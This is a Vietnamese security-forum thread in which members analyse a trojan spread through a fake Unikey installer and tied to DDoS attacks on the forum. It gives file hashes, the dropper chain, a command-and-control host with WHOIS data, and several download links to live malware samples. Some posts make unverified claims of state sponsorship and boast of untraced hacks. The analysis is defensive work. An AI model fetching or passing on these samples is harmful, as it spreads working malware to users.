Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244187 /hvaonline/posts/list/39641.html#244187 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi wrote:

acoustics89 wrote:
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi 
Mình rất sẵn lòng. Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì :(, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn). Không biết mình phải làm gì tiếp đây? 
Cám ơn nhiệt tình đáng quí của em. Mình làm việc này không chỉ cho HVA, mà còn có lơi cho công đồng, đất nước. Tôi sẽ phân tích các lý do của những hành động mà STL (tay sai cho Tầu) đã làm vừa qua. Việc phát hiện thông qua kỹ thuật mạng để biết STL liên quan chặt chẽ với chính quyền TQ đã khó rồi, nhưng việc sau đó lý giải một cách hơp lý lý do của các hành động của STL thời gian qua lai khó hơn rất nhiều. Quay trở lai vấn đề của topic. Với các thông tin của các bạn trong đó có lequi tôi đã tìm thấy ít nhất 5 master website-server của STL và đã check kỹ vào chúng để có các thông tin. Chúng đặt ở nhiều nơi trên TG. Điều ngạc nhiên là trong số 5 website-webserver nói trên có một cái khá hoành tráng về quy mô và cấu hình. Không hiểu có phải webserver này đã bị STL thâm nhập chiếm quyền admin.hay không? Chỉ mong các thông tin các bạn đưa ra là chính xác. Virus-Trojan liên hệ với các master-website này đúng là của STL, chứ không phải các hacker khác. Một điều mà tôi thấy chúng ta làm chưa thật tốt là chưa xác định được chính xác các process, service.. nào thưc sự kết nối đến các master website nói trên. Thưc ra để xác định chính xác điều này không dễ như tôi đã từng nhận định một cách chủ quan ở 1 bài viết trong topic này. Với tôi thì như vậy. Với các bạn khác có thể không như vậy. Các soft mà các bạn dùng như Wireshark và Process Monitoring... thưc ra không đáp ứng yêu cầu của ta, cũng không hẳn là đồ chuyên nghiệp của dân chơi mạng. Trên wireshark ta chỉ thấy các IP kết nôi (trừ khi phân tích kỹ bên trong packet thì có thể thêm vài thông tin) nhưng không thể biết các process kích hoạt kết nối. Còn trong Process Monitoring thì thấy tên các process (nhiều là khác) nhưng không hề biết các connection...vân vân. Theo tôi trong trường hợp này các bạn nên sử dung các Advanced firewall (loại mới-tiên tiến). Với firewall loai này, cùng lúc, các ban biết tên, vị trí trên directory các process kích hoạt các kết nối, đia chỉ IP và computer name của mục tiêu và kể cả RX -TX.... Firewall cũng cho phép ta ngăn sư thâm nhập sâu vào máy của virus 1 cách rất hiệu quả vì một malicious process nào của virus khởi chạy là firewall chặn lại chờ sự cho phép của ta. Vì vậy nếu ban lequi cần một firewall như vậy, thì tôi sẽ gửi đến bạn qua email. Hoăc bạn tự tìm cái tốt hơn. Có công cụ này việc ban giúp, làm sẽ dễ hơn ]]>
/hvaonline/posts/list/39641.html#244188 /hvaonline/posts/list/39641.html#244188 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi wrote:

acoustics89 wrote:
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi 
Mình rất sẵn lòng. Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì :(, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn). Không biết mình phải làm gì tiếp đây? 
Updated: Sau khi điều tra với anh em HVA xong, bạn có thể quét với CMC Antivirus (bản miễn phí nhưng luôn được cập nhật như bản CMCIS ấy :D ): http://pcu.cmclab.net/download/setupCMCIS.exe Tiếp theo, bạn gửi boot log với Process Monitor: Hướng dẫn scan và gửi boot log với Process Monitor http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-boot-log-v7899i-process-monitor/ Rồi gửi log Autoruns: Hướng dẫn scan và gửi log Autoruns http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/ ]]>
/hvaonline/posts/list/39641.html#244189 /hvaonline/posts/list/39641.html#244189 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244190 /hvaonline/posts/list/39641.html#244190 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244192 /hvaonline/posts/list/39641.html#244192 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
1 -Service, process nào download các file MSHelpCenter.exe về máy hoăc process nào inject malicious code vào file này?? ( Ngay từ lúc đầu file MSHelpCenter.exe có bị nhúng virus hay không?) 2- Virus-Trojạn nằm trong file MSHelpCenter.idx có quan hệ tác động gì đến file MSHelpCenter.exe, khi nào, tiến trình xảy ra theo trình tự thế nào khi máy bị nhiễm virus? 3- File đầu tiên gây nhiễm cho máy user mà user download về trên mạng (thí dụ Vietkey, Unikey....) là file nào trong trường hợp này.? Dĩ nhiên không phải là chính các file MSHelpCenter.exe hay MSHelpCenter.idx, vì dung lượng của chúng quá lơn, mà cũng chẳng ai lai cần download chúng về làm gì cả Vậy bạn có ý kiến thế nào về những vấn đề tôi đang thắc mắc, để tôi có thể giải toả và có kết luận cuối cùng cho mình?? 
Em xin trả lời : 1. Ý thứ (1) và thứ (3) của anh (nội dung gần giống nhau) thì hiện giờ em nghĩ không thể xác định được (với chỉ những file mà asaxin up lên cho chúng ta), có lẽ cần có thêm thời gian để phát hiện ra thêm điều gì đó :). 2. Cái file MSHelpCenter.idx thì em thấy nó sẽ được chạy hay không là phụ thuộc vào nội dung file cấu hình mà MSHelpCenter.exe tải về từ control server. MSHelpCenter.idx được rename thành file .msi, nhận tham số và thực thi. Nhưng với file MSHelpCenter.idx nhận được từ asaxin thì hình như không bao giờ làm nhiệm vụ :D. Edited : Ở trên em nhầm, file MSHelpCenter.idx là file trung gian, nó sẽ được MSHelpCenter.exe rename thành một file random.msi, sau đó MSHelpCenter.exe truyền tham số cho file .msi này (thông qua file .cfg). File .msi sẽ run và kiểm tra tham số và cuối cùng chỉ là để execute file AcrobatUpdater.exe (đã được decrypt từ file images.gif)]]>
/hvaonline/posts/list/39641.html#244195 /hvaonline/posts/list/39641.html#244195 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:
Em toàn dùng máy ảo để desassembling code , tất cả đều trong máy ảo cả. Máy ảo em tự cài từ đầu, các phần mềm bên trong cũng qua kiểm duyệt hết rồi Bây giờ đơn giản là anh dùng 1 chương trình Hex editor, jump đến các offset trong file MSHelpCenter.exe như em nói xem có đúng là nó thế hay không, chương trình hex editor nào cũng được. Nếu nó đúng, thì đó là 1 bằng chứng, 1 ví dụ về việc : các av bây giờ cũng chưa phải quá mạnh, việc tin tưởng vào nó là hơi phiêu lưu và mạo hiểm. Mặc dù đã được trang bị các công nghệ như emulator, Heurristic, thì vẫn không thể tin tưởng được. Có thể là 1 chiêu marketing của các AV... Và bây giờ, công nghệ tạo ra malware đang đi trước chung ta 1 bước. Hiện thực đáng sợ này bao giờ mới chấm dứt đây 
Hì hì, chỉ nhìn vô cái metadata của MsHelpCenter.exe là thấy không phải hiền lành rồi: Code:
Meta-data
=======
File:    MsHelpCenter.exe
Size:    9332736 bytes
Type:    PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5:     915e9432ca9414a771071ee0cc115930
SHA1:    9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6
ssdeep:  3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms
Date:    0x4D1868C7 [Mon Dec 27 10:21:59 2010 UTC]
EP:      0x403272 .text 0/5
CRC:     Claimed: 0x30c13, Actual: 0x8e87d2 [SUSPICIOUS]
]]>
/hvaonline/posts/list/39641.html#244198 /hvaonline/posts/list/39641.html#244198 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244199 /hvaonline/posts/list/39641.html#244199 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244200 /hvaonline/posts/list/39641.html#244200 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244201 /hvaonline/posts/list/39641.html#244201 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244203 /hvaonline/posts/list/39641.html#244203 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244205 /hvaonline/posts/list/39641.html#244205 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244208 /hvaonline/posts/list/39641.html#244208 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 wrote:
@bolzano_1989 : gui bro mau virus nay http://www.mediafire.com/?xyqk2z1jnp1zcd9 Con này mạo danh Avira GmbH Bác xử lý giùm nhé 
Bạn nên gọi đến số 1900571244 để được tư vấn và hỗ trợ bởi CMC InfoSec nếu gặp bất cứ vấn đề gì với CMCIS, đặc biệt là bạn không nên cài virus vô máy tính làm việc của bạn để thử nghiệm virus, đặc biệt là virus của STL. Bạn có thể tìm dùng tool diệt Sality của CMC: http://support.cmclab.net/vn/tpmod/?dl Phiên bản public mới nhất hiện tại: http://support.cmclab.net/vn/tpmod/?dl=item44 Nếu có vấn đề gì nữa, bạn trao đổi với mình qua tin nhắn riêng để tránh làm loãng chủ đề này nhé.]]>
/hvaonline/posts/list/39641.html#244210 /hvaonline/posts/list/39641.html#244210 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
PS: À mà còn việc này nữa, MSHelpCenter.exe chính là virus. Nhưng nếu nó chỉ có một mình, thì có thể xem như nó clean, sạch sẽ. Nhưng nếu để nó nằm trong ổ của nó gồm MSHelpCenter.idx, thumbcache.db, _desktop.ini, thì tụi nó kết hợp lại thành ổ virus.  
Vậy thì có phải là virus -trojạn "BackDoor.Generic 12.APEB" nằm trong file MSHelpCenter.idx sẽ inject các malicious code vào trong file MSHelpCenter.exe, như tôi đã từng dự đoán à? Phải như thế không TQN? Mải kiểm tra các master websites của STL (mong là đúng của STL) mất thời gian nhiều, nay kiểm lai xem có file nào là MSHelpCenter.exe trong các máy mình không? Kết quả là kiểm 3 máy cài WinXPSP3, 1may Windows7, 2 máy Win2K3 SP2 do chính mình quản lý, nhưng không thấy máy nào có cái file MSHelpCenter.exe cả. Lạ nhỉ? Các bạn thử kiểm máy mình có nó không? Vậy thì cái file MSHelpCenter.exe này trên máy axasin lấy từ đâu ra? Và nếu "khó" có nó như vậy, thì làm sao STL có thể dễ dàng tạo lập một mang lớn zombies tại VN với hàng trăm ngàn chiếc được? Càng lạ quá!]]>
/hvaonline/posts/list/39641.html#244212 /hvaonline/posts/list/39641.html#244212 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244213 /hvaonline/posts/list/39641.html#244213 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:

TQN wrote:
Vậy thì cái file MSHelpCenter.exe này trên máy axasin lấy từ đâu ra? Và nếu "khó" có nó như vậy, thì làm sao STL có thể dễ dàng tạo lập một mang lớn zombies tại VN với hàng trăm ngàn chiếc được? Càng lạ quá! 
Mình kiểm tra máy mình Xp Sp3 cũng không có PS: cái link này có thông tin gì chăng? http://xml.ssdsandbox.net/view/9cefbb3d8dbee992f914aeecd7bff063 Mình thấy Submission Details date là 5/14/2011 11:24:01 PM ]]> /hvaonline/posts/list/39641.html#244214 /hvaonline/posts/list/39641.html#244214 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
Mà em phát hiện ra 2 file này, em vui dã man. Theo suy đoán của em, thì nguồn virus là đây: http://nethoabinh.com/showthread.php?t=315 Và rất rất nhiều các phần mềm khác trên trang này TOP google. Hi vọng là em không làm mọi người đi sai hướng, cách đây khoảng vào lúc 1h AM ngày hôm nay, em đã tìm kiếm thử 2 file này nhưng hoàn toàn không có, vậy tại sao bây giờ lại có ???. Mà em có làm gì đâu chứ. Lạ 1 điều là file unikey em setup vào máy (nếu như dự đoán là trước đây e chưa từng dính) ngày 24, thì các file này thấy ngày tạo ra lại là ngày 23, mà ngày 23 em nhậu tơi bời có biết gì đâu, mỗi pà chị em dùng máy :(. Mà việc chỉnh sửa ngày tháng tạo ra file đối với mấy anh STL là quá quá dễ, em cũng làm được nữa (bằng AutoIT hehe). Hay là em đã vô tình nói cho các anh STL kích hoạt nó lên. Và giờ các thông tin của em tiêu tùng hết, mấy anh STL ơi em là dân đen, đừng đụng đến công việc của em dùm :((. Post sau e sẽ gửi cả đống file này lên. ]]>
/hvaonline/posts/list/39641.html#244215 /hvaonline/posts/list/39641.html#244215 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244216 /hvaonline/posts/list/39641.html#244216 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244219 /hvaonline/posts/list/39641.html#244219 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244220 /hvaonline/posts/list/39641.html#244220 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244223 /hvaonline/posts/list/39641.html#244223 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:

TQN wrote:
PS: À mà còn việc này nữa, MSHelpCenter.exe chính là virus. Nhưng nếu nó chỉ có một mình, thì có thể xem như nó clean, sạch sẽ. Nhưng nếu để nó nằm trong ổ của nó gồm MSHelpCenter.idx, thumbcache.db, _desktop.ini, thì tụi nó kết hợp lại thành ổ virus.  
Vậy thì có phải là virus -trojạn "BackDoor.Generic 12.APEB" nằm trong file MSHelpCenter.idx sẽ inject các malicious code vào trong file MSHelpCenter.exe, như tôi đã từng dự đoán à? Phải như thế không TQN? Mải kiểm tra các master websites của STL (mong là đúng của STL) mất thời gian nhiều, nay kiểm lai xem có file nào là MSHelpCenter.exe trong các máy mình không? Kết quả là kiểm 3 máy cài WinXPSP3, 1may Windows7, 2 máy Win2K3 SP2 do chính mình quản lý, nhưng không thấy máy nào có cái file MSHelpCenter.exe cả. Lạ nhỉ? Các bạn thử kiểm máy mình có nó không? Vậy thì cái file MSHelpCenter.exe này trên máy axasin lấy từ đâu ra? Và nếu "khó" có nó như vậy, thì làm sao STL có thể dễ dàng tạo lập một mang lớn zombies tại VN với hàng trăm ngàn chiếc được? Càng lạ quá! 
Chuẩn bị đi làm rồi, nhưng thấy còn nhiều thắc mắc của mọi người nên đã test thử. Bên dưới là link download unikey, đây chính là file đã sinh ra 2 các file mà chú nói. http://www.mediafire.com/?fee5d3428euao0k Đây là bản unikey cháu download lâu lắm rồi không nhớ là download link. Sau khi cháu đã xóa đi các file virus MSHelpCenter.*, tắt Avira, Firewall, thử chạy lại thằng Unikey này để test thì nó là sinh các file virus MSHelpCenter. Như vậy đây chính là thằng đã tạo ra. Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra. PS: Mình có nhớ ở đâu nói rằng (hình như trong diễn đàn này): Nếu bạn là người Việt Nam, sau khi cài xong Windows thì bạn sẽ làm gì? Tất nhiên là làm sao để máy mình có thể xài được tiếng Việt. Vậy thì việc tiếp theo bạn sẽ làm gì? Lên google search, download Unikey, Vietkey... Bọn STL này phải nói là thâm độc thiệt. Chúng nó cài malware lên PC của người Việt, rồi tiếp tay cho kẻ khác làm bậy. Làm sao ngẩng mặt nhìn mọi người đây. ]]>
/hvaonline/posts/list/39641.html#244224 /hvaonline/posts/list/39641.html#244224 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244225 /hvaonline/posts/list/39641.html#244225 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244228 /hvaonline/posts/list/39641.html#244228 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244229 /hvaonline/posts/list/39641.html#244229 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Mải kiểm tra các master websites của STL (mong là đúng của STL) mất thời gian nhiều, nay kiểm lai xem có file nào là MSHelpCenter.exe trong các máy mình không? Kết quả là kiểm 3 máy cài WinXPSP3, 1may Windows7, 2 máy Win2K3 SP2 do chính mình quản lý, nhưng không thấy máy nào có cái file MSHelpCenter.exe cả. Lạ nhỉ? Các bạn thử kiểm máy mình có nó không?
Cái file MSHelpCenter.exe không có trong máy , e kiểm tra 3 máy: 2 win 7, 1 winxp sp3 mà chẳng thấy. Những ai bị nhiễm mới có thì phải .]]> /hvaonline/posts/list/39641.html#244233 /hvaonline/posts/list/39641.html#244233 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244240 /hvaonline/posts/list/39641.html#244240 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
slt tới bây giờ chưa lòi rà một con "con mèo què" nào cho Linux, Unix. Đúng không mấy anh stl, sự thật mất lòng nhé. Tối nay em sương sương vài ba chai rồi, ngứa mồm lên chữi mấy anh chơi. Mấy anh tức không ? Làm gì được em ? À mà sao mấy anh sao không dùn 1 tool hide IP, cho 1 thằng đăng ký HVA này, lên đây, tự xưng tao là stl nè, đối chất công bằng với anh em HVA ha ? Đã fake IP rồi thì thánh cũng tìm không ra mà ! Tới bây giờ, em cũng rất muốn chat với 1 thành viên trong team mấy anh. Nick YM của em mấy anh thừa biết mà ha ! Sau này, đừng đánh giá ai thấp, nữa mùa nữa nhé, mấy anh stl ! Thật sự, khi mấy anh nói với Hà Vy Thoại là em là thằng RCE nữa mùa, em sôi gan lắm. Mấy anh nên biết là tới bây giờ, em chỉ dùng 40% công lực của em để dò theo mấy anh thôi. Chỉ cần em ngồi lỳ máy 2 tháng trời, bất chấp tất cả, em sẽ mò tới tận ổ mấy anh ! Đố mấy anh: nhiều vụ em đã hack, đã quậy tới giờ, FBI vẫn tìm không ra ! Đố mấy anh là những vụ gì ? Anonymous, Lucifer là trò trẻ con với em ! 
Nếu có nhà tài trợ nào đó cho anh TQN 2 tháng lương để cơm gạo áo tiền thì hay biết mấy nhĩ. Anh RE có nửa mùa hay không, có anh em Cviet, hva... này biết. Ở Việt Nam này cao thủ nhiều hay ko, giỏi đến mức nào thì tôi không biết. Nhưng với tôi, hiện nay anh đang là số 1 của làng CNTT VN]]>
/hvaonline/posts/list/39641.html#244241 /hvaonline/posts/list/39641.html#244241 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin wrote:
Chuẩn bị đi làm rồi, nhưng thấy còn nhiều thắc mắc của mọi người nên đã test thử. Bên dưới là link download unikey, đây chính là file đã sinh ra 2 các file mà chú nói. http://www.mediafire.com/?fee5d3428euao0k Đây là bản unikey cháu download lâu lắm rồi không nhớ là download link. Sau khi cháu đã xóa đi các file virus MSHelpCenter.*, tắt Avira, Firewall, thử chạy lại thằng Unikey này để test thì nó là sinh các file virus MSHelpCenter. Như vậy đây chính là thằng đã tạo ra. Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra. 
Vậy là đã giải đáp hoàn toàn thắc mắc của anh PXMMRF về việc MSHelpCenter.exe và MSHelpCenter.idx được sinh ra từ đâu rồi :)]]>
/hvaonline/posts/list/39641.html#244242 /hvaonline/posts/list/39641.html#244242 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET /highslide/highslide.css HTTP/1.1" 200 20399 "http://abcdef-site.com/" "-"
115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET /clientscript/vbulletin-core.js?v=408 HTTP/1.1" 200 47757 "http://abcdef-site.com/" "-"
115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET /highslide/highslide.min.js HTTP/1.1" 200 54296 "http://abcdef-site.com/" "-"
115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET / HTTP/1.1" 302 0 "http://abcdef-site.com/" "-"
Không có user-agent, abcd... là domain mình đã ẩn http://cC2.upanh.com/25.587.32753521.OoE0/1.png http://cC5.upanh.com/25.587.32753524.bi30/2.png http://www.stopforumspam.com/ipcheck/115.78.4.183 http://cC7.upanh.com/25.587.32753526.mkB0/3.png Kiểm thử nguyenvietcam77 thì cũng ra nethoabinh http://cC1.upanh.com/25.587.32753540.4vt0/5.png Kiểm thử vài cái nữa thì ra user khác, vậy là IP động rồi http://cC1.upanh.com/25.587.32753530.F8s0/4.png

sửa wrote:
Chỉnh lại cho đỡ kéo màn hình khi mọi người xem 
]]>
/hvaonline/posts/list/39641.html#244244 /hvaonline/posts/list/39641.html#244244 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
... Bây giờ cứ để đó, lên mạng down SysInternals Suite, CurrPort, SmartSniff. Đọc help và tập dùng. Chỉ cần nhiêu đó là đủ tìm ra "mèo què" rồi, không cần đao to búa lớn đâu. Bất kỳ tool nào, mình hiểu nó 1 thì nó mang lại cho mình 1, hiểu 10 thì mang lại 10. Tập trung vào Process Explorer và ProcMon, AutoRuns, TCPView. Đọc help cho kỹ. Trong Process Explorer, check menu "Verify Image Signatures" trong Options menu. Duyệt từng process trên upper panel, right click - Properties, click tab TCP/IP. Nếu thấy có connect tới link đó thì xem process đó có verify không (trong tab Image). Nếu không có verify => à à, mày là "mèo què". Còn có, verify từng Dll của process đó, cũng right click - Properties, Verify. Thằng nào không có verified thì up lên. Up lầm còn hơn bỏ sót. ...  
Nhờ anh TQN mà em vừa tìm được nguyên nhân vì sao khung search biến mất bấy lâu nay trên máy khi nhấn nút search chỉ còn chú cún ngồi quẩy đuôi đó là Worm/Win32.Polip.gen. Con này núp trong file driver em tải trên site của Nvidia do Antiy-AVL phát hiện, kill ẻm một phát, nhấn nút search, khung search xuất hiện liền. ]]>
/hvaonline/posts/list/39641.html#244245 /hvaonline/posts/list/39641.html#244245 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244253 /hvaonline/posts/list/39641.html#244253 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244255 /hvaonline/posts/list/39641.html#244255 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
File Unikey của asaxin và 2 file của lequy đã up lên đều ra virus của STL. Đặc biệt thằng MSHelpCenter.* của lequy up lại khác với MsHelpCenter.* mà ta đã biết, size chỉ còn 2 MB (đã biết: gần 9MB). Bây giờ em phải đi nữa rồi, chắc trưa hay chiều về mới tranh thủ phân tích. accouris89, exception và các anh em khác phân tích tụi này nhé ! 
File MSHelpCenter.* của lequy là giống với mẫu mà asaxin up. File size khác nhau là vì phần "rác" chèn thêm vào được sinh ngẫu nhiên, còn thực ra file gốc chỉ có : Code:
07/26/2011  11:04 PM           167,936          MsHelpCenter.exe
07/26/2011  11:04 PM            65,536          MsHelpCenter.idx
07/26/2011  11:04 PM            62,976          thumbcache.db
07/26/2011  11:04 PM            36,864          _desktop.ini
]]>
/hvaonline/posts/list/39641.html#244259 /hvaonline/posts/list/39641.html#244259 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:

asaxin wrote:
Chuẩn bị đi làm rồi, nhưng thấy còn nhiều thắc mắc của mọi người nên đã test thử. Bên dưới là link download unikey, đây chính là file đã sinh ra 2 các file mà chú nói. http://www.mediafire.com/?fee5d3428euao0k Đây là bản unikey cháu download lâu lắm rồi không nhớ là download link. Sau khi cháu đã xóa đi các file virus MSHelpCenter.*, tắt Avira, Firewall, thử chạy lại thằng Unikey này để test thì nó là sinh các file virus MSHelpCenter. Như vậy đây chính là thằng đã tạo ra. Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra. 
Vậy là đã giải đáp hoàn toàn thắc mắc của anh PXMMRF về việc MSHelpCenter.exe và MSHelpCenter.idx được sinh ra từ đâu rồi :) 
Ờ cảm ơn rang0 và đăc biệt là asaxin (tên em giống tên một cầu thủ Nga chơi cho Arsenal quá. Hì hì) Nhưng mà chưa hết đâu rang0 ạ. Chưa hết ờ câu này của axasin:
Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra 
Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN. Note. -Cái STL Master website-server mà tôi check từ thông tin của axasin chính là cái có quy mô khá hoành tráng, như tôi nói ở trên. - Tôi bắt đầu "hy sinh' 2 máy cài Win7 và Win XP cho nhiễm STL virus vào xem nó thế nào. Hơi mất công và thời gian đây.]]>
/hvaonline/posts/list/39641.html#244260 /hvaonline/posts/list/39641.html#244260 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Ờ cảm ơn rang0 và đăc biệt là asaxin (tên em giống tên một cầu thủ Nga chơi cho Arsenal quá. Hì hì) Nhưng mà chưa hết đâu rang0 ạ. Chưa hết ờ câu này của axasin:
Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra 
Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.  
Có 2 nơi mà file fake unikey sẽ drop MSHelpCenter.* và các thư viện đi kèm đó là : hoặc %windir% hoặc %temp% tuỳ vào việc nó gọi OpenSCManager có thành công hay không.]]>
/hvaonline/posts/list/39641.html#244264 /hvaonline/posts/list/39641.html#244264 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244265 /hvaonline/posts/list/39641.html#244265 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244266 /hvaonline/posts/list/39641.html#244266 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:
Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.  
Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN. Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" :P .]]>
/hvaonline/posts/list/39641.html#244267 /hvaonline/posts/list/39641.html#244267 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
Đây là 4 file trong thư mục Microsoft Help http://www.mediafire.com/?m5hljr2c17q5ueh Còn đây la file pcap em save lại từ wireshark ( em cho wireshark capture trước rồi chạy file UniKey, để nó chạy khoảng hơn 5 phút rồi save lại ) http://www.mediafire.com/?f0t4rhkavn5nmyf]]>
/hvaonline/posts/list/39641.html#244272 /hvaonline/posts/list/39641.html#244272 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244275 /hvaonline/posts/list/39641.html#244275 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244276 /hvaonline/posts/list/39641.html#244276 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244280 /hvaonline/posts/list/39641.html#244280 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
Down advertise.gif về, giả mã ra PE file, execute nó. Host express.blogdns.info có IP là: 91.211.118.119, vẫn còn sống nhăn răn, nhưng giờ này thì không mở port nào. Vì vậy nên advertise.gif em lấy về không được. IPNetInfo cho ra thông tin sau: Code:
inetnum:         91.211.116.0 - 91.211.119.255
netname:         net-0x2a
descr:           Zharkov Mukola Mukolayovuch
remarks:         Datacentre "0x2a"
country:         UA
org:             ORG-PEZM1-RIPE
admin-c:         ZN210-RIPE
tech-c:          ZN210-RIPE
status:          ASSIGNED PI
mnt-by:          RIPE-NCC-END-MNT
mnt-lower:       RIPE-NCC-END-MNT
mnt-by:          ONIK-MNT
mnt-routes:      ONIK-MNT
mnt-domains:     ONIK-MNT
changed:         support@netassist.kiev.ua 20081211
source:          RIPE

organisation:   ORG-PEZM1-RIPE
org-name:       Private Entreprise Zharkov Mukola Mukolayovuch
org-type:       OTHER
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
e-mail:         support@0x2a.com.ua
admin-c:        ZN210-RIPE
phone:          +38-044 587-83-16
